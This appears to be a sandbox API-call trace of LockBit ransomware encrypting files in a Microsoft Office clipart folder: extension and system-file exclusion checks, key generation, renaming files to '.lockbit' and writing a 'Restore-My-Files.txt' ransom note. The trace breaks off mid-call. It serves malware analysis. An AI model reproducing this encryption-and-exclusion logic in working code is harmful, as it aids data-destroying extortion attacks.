lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.324] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.325] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.325] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107042.WMF") returned 1 [0139.325] lstrcmpiW (lpString1="ntldr", lpString2="J0107042.WMF") returned 1 [0139.325] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107042.WMF") returned 1 [0139.325] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107042.WMF") returned -1 [0139.325] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107042.WMF") returned -1 [0139.325] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107042.WMF") returned 1 [0139.326] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107042.WMF") returned -1 [0139.326] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.326] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned=".WMF" [0139.326] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.326] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.326] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.326] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF.lockbit") returned 72 [0139.326] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107042.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.328] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.328] malloc (_Size=0x40068) returned 0x3df0008 [0139.328] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9048) returned 1 [0139.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.329] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.333] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.333] malloc (_Size=0xa6) returned 0x77d7a8 [0139.333] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.334] free (_Block=0x77d7a8) [0139.334] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.335] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.335] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.335] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3734, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107090.WMF", cAlternateFileName="")) returned 1 [0139.335] lstrcmpiW (lpString1=".", lpString2="J0107090.WMF") returned -1 [0139.335] lstrcmpiW (lpString1="..", lpString2="J0107090.WMF") returned -1 [0139.335] PathFindExtensionW (pszPath="J0107090.WMF") returned=".WMF" [0139.335] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.335] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.336] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.336] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107090.WMF") returned 1 [0139.336] lstrcmpiW (lpString1="ntldr", lpString2="J0107090.WMF") returned 1 [0139.336] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107090.WMF") returned 1 [0139.336] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107090.WMF") returned -1 [0139.337] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107090.WMF") returned -1 [0139.337] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107090.WMF") returned 1 [0139.337] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107090.WMF") returned -1 [0139.337] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.337] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned=".WMF" [0139.337] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.337] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.337] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.338] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.338] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.338] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.338] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.338] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.338] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.338] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF.lockbit") returned 72 [0139.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107090.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.339] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.339] malloc (_Size=0x40068) returned 0x3df0008 [0139.339] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14132) returned 1 [0139.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.340] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.340] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.340] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.344] malloc (_Size=0xa6) returned 0x77d7a8 [0139.345] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0139.346] free (_Block=0x77d7a8) [0139.346] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.346] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.346] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.346] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x69cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107130.WMF", cAlternateFileName="")) returned 1 [0139.346] lstrcmpiW (lpString1=".", lpString2="J0107130.WMF") returned -1 [0139.346] lstrcmpiW (lpString1="..", lpString2="J0107130.WMF") returned -1 [0139.346] PathFindExtensionW (pszPath="J0107130.WMF") returned=".WMF" [0139.346] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.346] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.347] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.347] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107130.WMF") returned 1 [0139.348] lstrcmpiW (lpString1="ntldr", lpString2="J0107130.WMF") returned 1 [0139.348] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107130.WMF") returned 1 [0139.348] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107130.WMF") returned -1 [0139.348] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107130.WMF") returned -1 [0139.348] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107130.WMF") returned 1 [0139.348] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107130.WMF") returned -1 [0139.348] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.348] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned=".WMF" [0139.348] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.348] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.348] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.349] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.349] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.349] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.349] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.349] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.349] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.349] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.349] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.349] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.349] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF.lockbit") returned 72 [0139.349] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.350] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.350] malloc (_Size=0x40068) returned 0x3df0008 [0139.350] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27084) returned 